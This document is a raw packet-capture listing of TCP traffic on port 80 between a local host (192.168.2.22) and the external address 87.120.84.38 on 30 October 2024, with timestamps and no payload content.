                                                                                                          Oct 30, 2024 08:19:41.892410994 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892426968 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892441988 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892477036 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892488956 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892499924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892513037 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892515898 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892529011 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892544985 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892580032 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892592907 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892605066 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892620087 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892627001 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892641068 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892679930 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892692089 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892702103 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892714024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892720938 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892726898 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892736912 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892746925 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892760992 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892801046 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892813921 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892827034 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892839909 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892848015 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892863989 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892934084 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892951012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892962933 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892975092 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892978907 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.892987013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.892991066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893001080 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893004894 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893013000 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893017054 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893026114 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893030882 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893038034 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893043995 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893050909 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893055916 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893069029 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893084049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893124104 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893136024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893147945 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893157005 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893161058 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893166065 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893177986 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893193960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893204927 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893238068 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.893246889 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893255949 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.893282890 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.063980103 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.063992023 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064008951 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064018011 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064073086 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064393997 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064405918 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064414978 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064430952 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064441919 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064443111 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064452887 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064456940 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064470053 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064483881 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064568043 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064579010 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064589977 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064603090 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064608097 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064614058 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064627886 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064644098 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064733028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064743996 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064754009 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064765930 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064770937 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064778090 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064783096 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064790010 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.064795971 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064807892 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.064822912 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065226078 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065237045 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065248013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065263987 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065275908 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065308094 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065319061 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065346956 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065493107 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065501928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065511942 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065521955 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065532923 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065547943 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065932989 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065959930 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065968990 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065969944 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.065984964 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.065999985 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066014051 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066024065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066035986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066056013 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066065073 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066142082 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066158056 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066169024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066179991 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066185951 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066196918 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066199064 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066205978 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066211939 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066226959 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066235065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066245079 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066255093 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066268921 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066281080 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066306114 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066320896 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066333055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066343069 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066344976 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066359043 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066380978 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066391945 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066426039 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066488028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066498041 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066508055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066523075 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066539049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066610098 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066621065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066632986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066648960 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066663027 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066672087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066682100 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066700935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066711903 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066869020 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066879034 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066890955 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066900969 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066905975 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066919088 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066932917 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066936970 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066948891 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066960096 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.066966057 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066977024 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.066992044 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067039967 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067050934 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067061901 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067073107 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067087889 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067096949 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067111969 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067154884 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067192078 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067250013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067260027 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067290068 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067293882 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067306042 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067322016 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067332029 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067337036 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067343950 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067354918 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067361116 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067368031 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067372084 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067388058 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067394972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067405939 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067405939 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067419052 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067433119 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067481995 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067492008 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067502022 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067518950 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067531109 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067605972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067616940 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067626953 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067642927 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067656040 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067866087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067877054 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067888975 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067905903 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067923069 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.067960024 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067970037 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067981005 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.067991972 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068011045 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068026066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068100929 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068110943 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068120956 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068131924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068140030 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068142891 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068147898 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068154097 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068164110 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068166018 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068176985 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068176985 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068187952 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068202972 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068217993 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068233013 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068248987 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068264961 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068269014 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068289995 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068391085 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068401098 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068430901 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068476915 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068487883 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068509102 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068523884 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068587065 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068597078 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068608046 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068619967 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068624973 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068635941 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068650007 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068675995 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068685055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068695068 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068706989 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068711042 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068717957 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068722963 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068736076 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068753004 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068763018 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068773985 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068799019 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068856001 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068867922 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068897963 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068900108 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068911076 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068921089 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.068929911 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.068943024 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069015026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069025040 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069036007 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069047928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069052935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069060087 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069063902 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069080114 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069092035 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069245100 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069256067 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069267035 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069278955 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069284916 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069313049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069313049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069348097 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069359064 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069382906 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069412947 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069422960 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069433928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069444895 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069448948 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069462061 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069473982 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069499969 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069509983 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069520950 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069529057 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069531918 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069546938 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069549084 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069559097 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069562912 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069571018 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069585085 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069597006 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069612980 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069649935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069709063 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069717884 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069740057 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069745064 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:42.069751978 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069761992 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:42.069766998 CET4916180192.168.2.2287.120.84.38
